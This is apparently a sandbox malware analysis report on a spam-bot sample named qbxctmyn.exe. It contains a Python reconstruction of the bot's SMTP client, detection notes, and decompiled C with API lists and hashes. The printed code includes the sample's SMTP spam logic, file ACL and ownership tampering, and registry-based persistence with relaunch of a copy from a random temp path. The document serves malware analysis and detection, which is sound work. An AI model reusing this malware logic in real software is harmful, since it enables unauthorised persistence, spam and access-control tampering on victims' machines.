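            # first four bytes with byte 3 forced to ' ': "250-" becomes "250 ",
            # the prefix only the final line of a multi-line reply carries
            last_line_marker = buf[:3] + b" "
        if last_line_marker and last_line_marker in buf:
            break
    return None, buf


def classify_reply(buf, state, patterns=(None, None, None), own_ip=b""):
    """Checks that follow the loop; state is the routine's second argument.

    patterns model the three config strings at 0x413630/34/38 (assumed to be
    substrings looked for in rejections); own_ip models the 'localcfg ip' value.
    Returns (result, esmtp_seen); esmtp_seen models the flag stored at 0x413668.
    """
    if state == 7:
        return R_OK, None                   # the reply to QUIT is never inspected
    if len(buf) < 5 or buf[-1:] != b"\n":
        return R_MALFORMED, None            # "Incorrect respons"
    code = atoi(buf)
    if code in ACCEPTED:
        return R_OK, b"ESMTP" in buf        # EHLO vs HELO is decided from the banner
    if state == 12 and code == 535:
        return R_AUTH_FAILED, None
    p0, p1, p2 = patterns
    if not (p0 and p1 and p2):
        return R_REJECTED, None             # no classification strings configured
    if state == 4 and p0 in buf:
        return R_MATCH_0, None
    if p1 in buf:
        return R_MATCH_1, None
    if p2 in buf:
        return R_MATCH_2, None
    if state in (3, 4, 5, 6) and own_ip and own_ip in buf:
        return R_MATCH_1, None              # rejection names the bot's own address
    return R_REJECTED, None
```

Two points a detection engineer can take from the listing without the model: the command verbs go out lowercase (`helo`/`ehlo`, `mail from:<`, `rcpt to:<`, `data`, `quit`) while `AUTH LOGIN` is uppercase, which is an unusual mix for a legitimate MTA, and the client only reads 500 bytes of any reply before abandoning it, so a long EHLO capability list from a server is enough to make this client bail out with result 6.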
Instruction addresses for the decompiled listing above (the address column of the report's code view, in listing order; 0x00000000 marks a line with no mapped instruction):
0x0040a7cb 0x0040a7cf 0x0040a7cf 0x0040a7d3 0x0040a7d9 0x0040a87d 0x0040a87e 0x0040a886 0x0040a88d 0x0040a893 0x0040a897 0x0040a8bf 0x0040a8c2 0x0040a8f2 0x0040a8f2 0x0040a8f8 0x0040a8fa 0x0040a900 0x0040a906 0x0040a909 0x0040a90a 0x0040a978 0x0040a97c 0x0040a97e 0x0040a980 0x00000000 0x00000000 0x0040a912 0x0040a914 0x0040a91a 0x0040a9b9 0x0040a9c2 0x0040ab4a 0x0040ab4a 0x00000000 0x0040ab4a 0x0040a920 0x0040a924 0x0040a92c 0x0040a954 0x0040a95f 0x0040a966 0x0040a968 0x00000000 0x00000000 0x0040a96a 0x0040a96c 0x0040a96c 0x0040a96e 0x0040a970 0x0040a971 0x00000000 0x0040a971 0x0040a92e 0x0040a931 0x00000000 0x00000000 0x0040a940 0x0040a945 0x0040a948 0x0040a94c 0x0040a952 0x00000000 0x00000000 0x00000000 0x0040a952 0x0040a982 0x0040a985 0x0040a988 0x0040a89e 0x0040a89e 0x00000000 0x0040a89e 0x0040a98e 0x0040a991 0x0040a9d1 0x0040a993 0x0040a99f 0x0040a9a7 0x0040a9aa 0x0040a9aa 0x0040a9d8
                                                                                0x0040a9db
                                                                                0x0040ab39
                                                                                0x0040ab41
                                                                                0x0040ab48
                                                                                0x00000000
                                                                                0x0040a9e1
                                                                                0x0040a9e1
                                                                                0x0040a9e9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a9fb
                                                                                0x0040a9fe
                                                                                0x0040aa04
                                                                                0x0040aa32
                                                                                0x0040aa40
                                                                                0x0040aa41
                                                                                0x0040aa46
                                                                                0x0040aa49
                                                                                0x0040aa49
                                                                                0x0040aa4d
                                                                                0x0040aa52
                                                                                0x0040aa54
                                                                                0x0040aa54
                                                                                0x0040aa57
                                                                                0x0040aa68
                                                                                0x0040aa68
                                                                                0x0040aa6a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aa70
                                                                                0x0040aa75
                                                                                0x0040aa77
                                                                                0x0040ab35
                                                                                0x0040ab35
                                                                                0x00000000
                                                                                0x0040ab35
                                                                                0x0040aa7d
                                                                                0x0040aa83
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aa89
                                                                                0x0040aa8f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aa95
                                                                                0x0040aa98
                                                                                0x0040aab4
                                                                                0x0040aac1
                                                                                0x0040aac8
                                                                                0x0040aaca
                                                                                0x0040aadd
                                                                                0x0040aae4
                                                                                0x0040aae6
                                                                                0x0040aaec
                                                                                0x0040aaef
                                                                                0x0040ab00
                                                                                0x0040ab12
                                                                                0x0040ab1a
                                                                                0x0040ab29
                                                                                0x0040ab31
                                                                                0x0040ab33
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ab33
                                                                                0x0040aaf1
                                                                                0x0040aaf4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aaf6
                                                                                0x0040aaf9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aafb
                                                                                0x0040aafe
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aafe
                                                                                0x0040aae8
                                                                                0x00000000
                                                                                0x0040aae8
                                                                                0x0040aacc
                                                                                0x0040aacc
                                                                                0x00000000
                                                                                0x0040aacc
                                                                                0x0040aaa2
                                                                                0x0040aaa9
                                                                                0x0040aaab
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aaad
                                                                                0x00000000
                                                                                0x0040aaad
                                                                                0x0040aa59
                                                                                0x0040aa5f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aa61
                                                                                0x00000000
                                                                                0x0040aa61
                                                                                0x0040aa06
                                                                                0x0040aa0c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aa0e
                                                                                0x0040aa14
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aa16
                                                                                0x0040aa1c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aa1e
                                                                                0x0040aa24
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aa26
                                                                                0x0040aa2c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aa2e
                                                                                0x00000000
                                                                                0x0040aa2e
                                                                                0x0040a9db
                                                                                0x0040a8c8
                                                                                0x0040a8d2
                                                                                0x0040a8d4
                                                                                0x0040a8d6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a8e2
                                                                                0x00000000
                                                                                0x0040a8eb
                                                                                0x0040a89c
                                                                                0x0040a8af
                                                                                0x0040a8b8
                                                                                0x00000000
                                                                                0x0040a8b8
                                                                                0x00000000
                                                                                0x0040a89c
                                                                                0x0040a7df
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a7ed
                                                                                0x0040a7f0
                                                                                0x0040a7f3
                                                                                0x0040a803
                                                                                0x0040a7f5
                                                                                0x0040a7f5
                                                                                0x0040a7f5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a845
                                                                                0x0040a848
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a852
                                                                                0x0040a855
                                                                                0x0040a84d
                                                                                0x0040a84d
                                                                                0x0040a7fa
                                                                                0x0040a7fb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a85c
                                                                                0x0040a85e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a86a
                                                                                0x0040a86c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a80a
                                                                                0x0040a80c
                                                                                0x0040a871
                                                                                0x0040a871
                                                                                0x0040a874
                                                                                0x0040a875
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a813
                                                                                0x0040a816
                                                                                0x0040a816
                                                                                0x0040a819
                                                                                0x0040a819
                                                                                0x0040a81b
                                                                                0x0040a81c
                                                                                0x0040a81c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a836
                                                                                0x0040a839
                                                                                0x0040a839
                                                                                0x0040a83c
                                                                                0x0040a83c
                                                                                0x0040a83e
                                                                                0x0040a83f
                                                                                0x0040a83f
                                                                                0x0040a820
                                                                                0x0040a824
                                                                                0x0040a82f
                                                                                0x0040a87a
                                                                                0x0040a87a
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 0040A7FB
                                                                                • lstrlenA.KERNEL32(?,00000000,00000000,00000001), ref: 0040A87E
                                                                                • send.WS2_32(00000000,?,00000000,00000000), ref: 0040A893
                                                                                • wsprintfA.USER32 ref: 0040A8AF
                                                                                • send.WS2_32(00000000,.,00000005,00000000), ref: 0040A8D2
                                                                                • wsprintfA.USER32 ref: 0040A8E2
                                                                                • recv.WS2_32(00000000,?,000003F6,00000000), ref: 0040A97C
                                                                                • wsprintfA.USER32 ref: 0040A9B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$send$lstrlenrecv
                                                                                • String ID: .$AUTH LOGIN$ESMTP$Error sending command (sent = %d/%d)$Incorrect respons$Too big smtp respons (%d bytes)$Too small respons$data$ehlo %s$helo %s$localcfg$mail from:<%s>$quit$rcpt to:<%s>
                                                                                • API String ID: 3650048968-2394369944
                                                                                • Opcode ID: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
                                                                                • Instruction ID: cb8b6fe7cbcb8804cc0a5996a8d7cccc3c4edaa2c523fe44b9a5a0cb3107b5a3
                                                                                • Opcode Fuzzy Hash: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
                                                                                • Instruction Fuzzy Hash: 34A16872A44305AADF209A54DC85FEF3B79AB00304F244437FA05B61D0DA7D9DA98B5F
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 00E37A96
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00E37ACD
                                                                                • GetLengthSid.ADVAPI32(?), ref: 00E37ADF
                                                                                • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 00E37B01
                                                                                • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 00E37B1F
                                                                                • EqualSid.ADVAPI32(?,?), ref: 00E37B39
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 00E37B4A
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00E37B58
                                                                                • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00E37B68
                                                                                • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00E37B77
                                                                                • LocalFree.KERNEL32(00000000), ref: 00E37B7E
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E37B9A
                                                                                • GetAce.ADVAPI32(?,?,?), ref: 00E37BCA
                                                                                • EqualSid.ADVAPI32(?,?), ref: 00E37BF1
                                                                                • DeleteAce.ADVAPI32(?,?), ref: 00E37C0A
                                                                                • EqualSid.ADVAPI32(?,?), ref: 00E37C2C
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 00E37CB1
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00E37CBF
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00E37CD0
                                                                                • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00E37CE0
                                                                                • LocalFree.KERNEL32(00000000), ref: 00E37CEE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                • String ID: D
                                                                                • API String ID: 3722657555-2746444292
                                                                                • Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                • Instruction ID: 7ce5df27b7ca595d1882632e97153b317d18d35ded3b2252efc18c87b22fe5c8
                                                                                • Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                • Instruction Fuzzy Hash: E9814BB1904219AFDB21CFA4DD88FEEBFB8AF0C344F04906AE545F6150D7759A41CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 98%
                                                                                			E00407809(CHAR* _a4, signed int _a8) {
                                                                                				signed int _v8;
                                                                                				void* _v12;
                                                                                				void* _v16;
                                                                                				struct _ACL* _v20;
                                                                                				signed int _v24;
                                                                                				int _v28;
                                                                                				long _v32;
                                                                                				long _v36;
                                                                                				long _v40;
                                                                                				long _v44;
                                                                                				int _v48;
                                                                                				int _v52;
                                                                                				union _SID_NAME_USE _v56;
                                                                                				int _v60;
                                                                                				void _v128;
                                                                                				char _v384;
                                                                                				char _v512;
                                                                                				struct _SECURITY_DESCRIPTOR _v1536;
                                                                                				struct _ACL* _t110;
                                                                                				int _t120;
                                                                                				intOrPtr _t121;
                                                                                				signed int _t123;
                                                                                				signed int _t141;
                                                                                				char* _t146;
                                                                                				signed int _t153;
                                                                                				void* _t154;
                                                                                				void* _t155;
                                                                                				void* _t156;
                                                                                
                                                                                				_t141 = 0;
                                                                                				_v28 = 0;
                                                                                				_v20 = 0;
                                                                                				_v36 = 0x80;
                                                                                				if(GetUserNameA( &_v384,  &_v36) == 0) {
                                                                                					L42:
                                                                                					return _v28;
                                                                                				}
                                                                                				_v32 = 0x44;
                                                                                				_v40 = 0x80;
                                                                                				if(LookupAccountNameA(0,  &_v384,  &_v128,  &_v32,  &_v512,  &_v40,  &_v56) == 0) {
                                                                                					goto L42;
                                                                                				}
                                                                                				_v32 = GetLengthSid( &_v128);
                                                                                				_v44 = 0x400;
                                                                                				if(GetFileSecurityA(_a4, 5,  &_v1536, 0x400,  &_v44) == 0) {
                                                                                					goto L42;
                                                                                				} else {
                                                                                					if(GetSecurityDescriptorOwner( &_v1536,  &_v16,  &_v48) != 0) {
                                                                                						_v36 = 0x80;
                                                                                						_v40 = 0x80;
                                                                                						if(EqualSid( &_v128, _v16) == 0) {
                                                                                							_v28 = 1;
                                                                                							_t155 = LocalAlloc(0x40, 0x14);
                                                                                							if(_t155 != 0) {
                                                                                								LocalFree(_t155);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					_v24 = _t141;
                                                                                					if(GetSecurityDescriptorDacl( &_v1536,  &_v60,  &_v20,  &_v52) == 0) {
                                                                                						L41:
                                                                                						goto L42;
                                                                                					}
                                                                                					_t110 = _v20;
                                                                                					if(_t110 == _t141) {
                                                                                						goto L41;
                                                                                					}
                                                                                					_v8 = _v8 & _t141;
                                                                                					if(0 >= _t110->AceCount) {
                                                                                						goto L41;
                                                                                					} else {
                                                                                						goto L13;
                                                                                					}
                                                                                					do {
                                                                                						L13:
                                                                                						if(GetAce(_t110, _v8,  &_v12) == 0) {
                                                                                							L32:
                                                                                							_v8 = _v8 + 1;
                                                                                							goto L33;
                                                                                						}
                                                                                						_t153 = 0;
                                                                                						_v16 = _v12 + 8;
                                                                                						if(_t141 <= 0) {
                                                                                							L19:
                                                                                							if(_t141 < 0x20) {
                                                                                								 *((intOrPtr*)(_t156 + _t141 * 4 - 0xfc)) = _v16;
                                                                                								_t141 = _t141 + 1;
                                                                                							}
                                                                                							_t120 = EqualSid( &_v128, _v16);
                                                                                							_t146 = _v12;
                                                                                							if(_t120 == 0) {
                                                                                								_t121 = 0x1200a8;
                                                                                							} else {
                                                                                								asm("sbb eax, eax");
                                                                                								_t121 = ( ~_a8 & 0x00090046) + 0x1601b9;
                                                                                							}
                                                                                							if( *((intOrPtr*)(_t146 + 4)) != _t121) {
                                                                                								 *((intOrPtr*)(_t146 + 4)) = _t121;
                                                                                								_t146 = _v12;
                                                                                								_v24 = 1;
                                                                                							}
                                                                                							if( *_t146 != 0 || ( *(_t146 + 1) & 0x00000010) != 0) {
                                                                                								 *_t146 = 0;
                                                                                								_t66 = _v16 + 8; // 0xc8685f74
                                                                                								_t123 =  *_t66;
                                                                                								if(_t123 != 0) {
                                                                                									 *((char*)(_v12 + 1)) = (_t123 & 0xffffff00 | _t123 - 0x00000050 > 0x00000000) + 2;
                                                                                								} else {
                                                                                									 *((char*)(_v12 + 1)) = 0xb;
                                                                                								}
                                                                                								_v24 = 1;
                                                                                							}
                                                                                							goto L32;
                                                                                						}
                                                                                						while(EqualSid( *(_t156 + _t153 * 4 - 0xfc), _v16) == 0) {
                                                                                							_t153 = _t153 + 1;
                                                                                							if(_t153 < _t141) {
                                                                                								continue;
                                                                                							}
                                                                                							break;
                                                                                						}
                                                                                						if(_t153 >= _t141) {
                                                                                							goto L19;
                                                                                						}
                                                                                						DeleteAce(_v20, _v8);
                                                                                						_v24 = 1;
                                                                                						L33:
                                                                                						_t110 = _v20;
                                                                                					} while (_v8 < (_t110->AceCount & 0x0000ffff));
                                                                                					if(_v24 != 0) {
                                                                                						_v28 = 1;
                                                                                						_t154 = LocalAlloc(0x40, 0x14);
                                                                                						if(_t154 != 0) {
                                                                                							if(InitializeSecurityDescriptor(_t154, 1) != 0 && SetSecurityDescriptorDacl(_t154, 1, _v20, 0) != 0 && SetFileSecurityA(_a4, 4, _t154) != 0) {
                                                                                								_v28 = 1;
                                                                                							}
                                                                                							LocalFree(_t154);
                                                                                						}
                                                                                					}
                                                                                					goto L41;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 0040782F
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00407866
                                                                                • GetLengthSid.ADVAPI32(?), ref: 00407878
                                                                                • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 0040789A
                                                                                • GetSecurityDescriptorOwner.ADVAPI32(?,00407F63,?), ref: 004078B8
                                                                                • EqualSid.ADVAPI32(?,00407F63), ref: 004078D2
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 004078E3
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 004078F1
                                                                                • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407901
                                                                                • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00407910
                                                                                • LocalFree.KERNEL32(00000000), ref: 00407917
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00407933
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00407963
                                                                                • EqualSid.ADVAPI32(?,00407F63), ref: 0040798A
                                                                                • DeleteAce.ADVAPI32(?,00000000), ref: 004079A3
                                                                                • EqualSid.ADVAPI32(?,00407F63), ref: 004079C5
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 00407A4A
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407A58
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00407A69
                                                                                • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00407A79
                                                                                • LocalFree.KERNEL32(00000000), ref: 00407A87
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                • String ID: D
                                                                                • API String ID: 3722657555-2746444292
                                                                                • Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                • Instruction ID: df0c13f2d89176358eaf39038022480abc221899387876bf5e0f356ce13a0778
                                                                                • Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                • Instruction Fuzzy Hash: 59813C71E04119ABDB11CFA5DD44FEFBBB8AB08340F14817AE505F6290D739AA41CF69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 97%
                                                                                			E00408328(char* __ecx, char __edx) {
                                                                                				char _v8;
                                                                                				void* _v12;
                                                                                				int _v16;
                                                                                				char _v20;
                                                                                				intOrPtr _v24;
                                                                                				int _v28;
                                                                                				struct _PROCESS_INFORMATION _v44;
                                                                                				char _v60;
                                                                                				struct _STARTUPINFOA _v128;
                                                                                				char _v388;
                                                                                				char _v427;
                                                                                				char _v428;
                                                                                				char _t88;
                                                                                				char _t89;
                                                                                				void* _t91;
                                                                                				char _t93;
                                                                                				int _t102;
                                                                                				char _t107;
                                                                                				intOrPtr _t113;
                                                                                				char _t116;
                                                                                				void* _t117;
                                                                                				signed int _t122;
                                                                                				char _t126;
                                                                                				void* _t128;
                                                                                				char* _t130;
                                                                                				char _t131;
                                                                                				char* _t133;
                                                                                				char _t134;
                                                                                				char* _t137;
                                                                                				int _t139;
                                                                                				char _t144;
                                                                                				char _t146;
                                                                                				char* _t147;
                                                                                				char _t149;
                                                                                				char _t153;
                                                                                				intOrPtr* _t154;
                                                                                				char* _t156;
                                                                                				char* _t159;
                                                                                				char _t160;
                                                                                				char _t165;
                                                                                				void* _t174;
                                                                                				signed int _t177;
                                                                                				char _t180;
                                                                                				char* _t188;
                                                                                				int _t189;
                                                                                				long _t193;
                                                                                				void* _t195;
                                                                                				void* _t196;
                                                                                				void* _t198;
                                                                                				void* _t199;
                                                                                
                                                                                				_t181 = __edx;
                                                                                				_t173 = __ecx;
                                                                                				_v16 = 0;
                                                                                				if(E00407DD6(__edx) != 0) {
                                                                                					return 1;
                                                                                				}
                                                                                				_t88 = E00406EC3();
                                                                                				__eflags = _t88;
                                                                                				if(_t88 != 0) {
                                                                                					_v8 = 0;
                                                                                					__eflags =  *0x412c3c; // 0x0
                                                                                					if(__eflags == 0) {
                                                                                						goto L37;
                                                                                					}
                                                                                					__eflags =  *0x412c38; // 0x0
                                                                                					if(__eflags == 0) {
                                                                                						goto L37;
                                                                                					}
                                                                                					_t130 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
                                                                                					_t198 = _t196 + 0x14;
                                                                                					_t131 = RegOpenKeyExA(0x80000001, _t130, 0, 0x101,  &_v12);
                                                                                					__eflags = _t131;
                                                                                					if(_t131 != 0) {
                                                                                						L31:
                                                                                						_t133 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
                                                                                						_t198 = _t198 + 0x14;
                                                                                						_t134 = RegOpenKeyExA(0x80000001, _t133, 0, 0x103,  &_v12);
                                                                                						__eflags = _t134;
                                                                                						if(_t134 != 0) {
                                                                                							L35:
                                                                                							E0040EE2A(_t173, 0x4122f8, 0, 0x100);
                                                                                							_t196 = _t198 + 0xc;
                                                                                							__eflags = _v8;
                                                                                							if(_v8 != 0) {
                                                                                								E0040EC2E(_v8);
                                                                                							}
                                                                                							goto L37;
                                                                                						}
                                                                                						_t188 =  *0x412c3c; // 0x0
                                                                                						_t137 = _t188;
                                                                                						_t44 =  &(_t137[1]); // 0x1
                                                                                						_t173 = _t44;
                                                                                						do {
                                                                                							_t181 =  *_t137;
                                                                                							_t137 =  &(_t137[1]);
                                                                                							__eflags = _t181;
                                                                                						} while (_t181 != 0);
                                                                                						_t139 = _t137 - _t173 + 1;
                                                                                						__eflags = _t139;
                                                                                						RegSetValueExA(_v12,  *0x412c38, 0, 1, _t188, _t139);
                                                                                						RegCloseKey(_v12);
                                                                                						goto L35;
                                                                                					}
                                                                                					_t144 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, 0,  &_v16);
                                                                                					__eflags = _t144;
                                                                                					if(_t144 == 0) {
                                                                                						__eflags = _v28 - 1;
                                                                                						if(_v28 == 1) {
                                                                                							__eflags = _v16;
                                                                                							if(_v16 > 0) {
                                                                                								_t147 = E0040EBCC(_v16);
                                                                                								_pop(_t173);
                                                                                								_v8 = _t147;
                                                                                								__eflags = _t147;
                                                                                								if(_t147 != 0) {
                                                                                									_t173 =  &_v16;
                                                                                									_t149 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, _t147,  &_v16);
                                                                                									__eflags = _t149;
                                                                                									if(_t149 != 0) {
                                                                                										E0040EC2E(_v8);
                                                                                										_pop(_t173);
                                                                                										_v8 = 0;
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					RegCloseKey(_v12);
                                                                                					__eflags = _v8;
                                                                                					if(_v8 != 0) {
                                                                                						_t146 = E0040EED1(_v8,  *0x412c3c);
                                                                                						_pop(_t173);
                                                                                						__eflags = _t146;
                                                                                						if(_t146 == 0) {
                                                                                							goto L35;
                                                                                						}
                                                                                					}
                                                                                					goto L31;
                                                                                				} else {
                                                                                					_t153 = E004073FF(_t173, 0x410264, 0, 0,  &_v388,  &_v60);
                                                                                					_t199 = _t196 + 0x14;
                                                                                					__eflags = _t153;
                                                                                					if(_t153 <= 0) {
                                                                                						L19:
                                                                                						_t91 = 0;
                                                                                						L56:
                                                                                						return _t91;
                                                                                					}
                                                                                					__eflags = _v388;
                                                                                					if(_v388 == 0) {
                                                                                						goto L19;
                                                                                					}
                                                                                					__eflags = _v60;
                                                                                					if(_v60 == 0) {
                                                                                						goto L19;
                                                                                					} else {
                                                                                						_t154 =  &_v388;
                                                                                						_t181 = _t154 + 1;
                                                                                						do {
                                                                                							_t180 =  *_t154;
                                                                                							_t154 = _t154 + 1;
                                                                                							__eflags = _t180;
                                                                                						} while (_t180 != 0);
                                                                                						_t156 = _t195 + _t154 - _t181 - 0x181;
                                                                                						__eflags =  *_t156 - 0x5c;
                                                                                						if( *_t156 == 0x5c) {
                                                                                							 *_t156 = 0;
                                                                                						}
                                                                                						__eflags =  *0x412159 - 0x60;
                                                                                						if( *0x412159 < 0x60) {
                                                                                							L18:
                                                                                							E0040EE2A(_t180, 0x4122f8, 0, 0x100);
                                                                                							_t196 = _t199 + 0xc;
                                                                                							L37:
                                                                                							_v20 = 0;
                                                                                							_v8 = 0;
                                                                                							__eflags = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe"; // 0x43
                                                                                							if(__eflags == 0) {
                                                                                								L42:
                                                                                								__eflags =  *0x412cd8; // 0x0
                                                                                								if(__eflags != 0) {
                                                                                									L46:
                                                                                									_t89 = E00406BA7(0x412cd8);
                                                                                									_pop(_t174);
                                                                                									__eflags = _t89;
                                                                                									if(_t89 == 0) {
                                                                                										L52:
                                                                                										 *0x412cd8 = 0;
                                                                                										L53:
                                                                                										__eflags = _v8;
                                                                                										if(_v8 != 0) {
                                                                                											E0040EC2E(_v8);
                                                                                										}
                                                                                										_t91 = 1;
                                                                                										__eflags = 1;
                                                                                										goto L56;
                                                                                									}
                                                                                									_t93 = E00407E2F(_t181);
                                                                                									__eflags = _t93;
                                                                                									if(_t93 != 0) {
                                                                                										L51:
                                                                                										DeleteFileA(0x412cd8);
                                                                                										goto L52;
                                                                                									}
                                                                                									_t193 = 0x44;
                                                                                									E0040EE2A(_t174,  &_v128, 0, _t193);
                                                                                									_v128.cb = _t193;
                                                                                									E0040EE2A(_t174,  &_v44, 0, 0x10);
                                                                                									_v428 = 0x22;
                                                                                									lstrcpyA( &_v427, 0x412cd8);
                                                                                									_t102 = lstrlenA( &_v428);
                                                                                									 *((char*)(_t195 + _t102 - 0x1a8)) = 0x22;
                                                                                									 *((char*)(_t195 + _t102 - 0x1a7)) = 0;
                                                                                									E00407FCF(_t174);
                                                                                									_t107 = CreateProcessA(0,  &_v428, 0, 0, 0, 0x8000000, 0, 0,  &_v128,  &_v44);
                                                                                									__eflags = _t107;
                                                                                									if(_t107 == 0) {
                                                                                										E00407EE6(_t174);
                                                                                										E00407EAD(_t181, __eflags, 0);
                                                                                										goto L51;
                                                                                									}
                                                                                									CloseHandle(_v44.hThread);
                                                                                									CloseHandle(_v44);
                                                                                									goto L53;
                                                                                								}
                                                                                								GetTempPathA(0x12c, 0x412cd8);
                                                                                								_t113 = E00408274(0x412cd8);
                                                                                								_pop(_t177);
                                                                                								_v24 = _t113;
                                                                                								_t116 = (E0040ECA5() & 0x00000003) + 5;
                                                                                								_v20 = _t116;
                                                                                								__eflags = _t116;
                                                                                								if(_t116 <= 0) {
                                                                                									L45:
                                                                                									_t117 = E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8);
                                                                                									_t69 = _v24 + 0x412cd8; // 0x0
                                                                                									E0040EF00(_t69, _t117);
                                                                                									E0040EE2A(_t177, 0x4122f8, 0, 0x100);
                                                                                									_t196 = _t196 + 0x28;
                                                                                									goto L46;
                                                                                								} else {
                                                                                									goto L44;
                                                                                								}
                                                                                								do {
                                                                                									L44:
                                                                                									_t122 = E0040ECA5();
                                                                                									_t177 = 0x1a;
                                                                                									_t181 = _t122 % _t177 + 0x61;
                                                                                									_v24 = _v24 + 1;
                                                                                									_v20 = _v20 - 1;
                                                                                									 *((char*)(_v24 + 0x412cd8)) = _t122 % _t177 + 0x61;
                                                                                									__eflags = _v20;
                                                                                								} while (_v20 > 0);
                                                                                								goto L45;
                                                                                							}
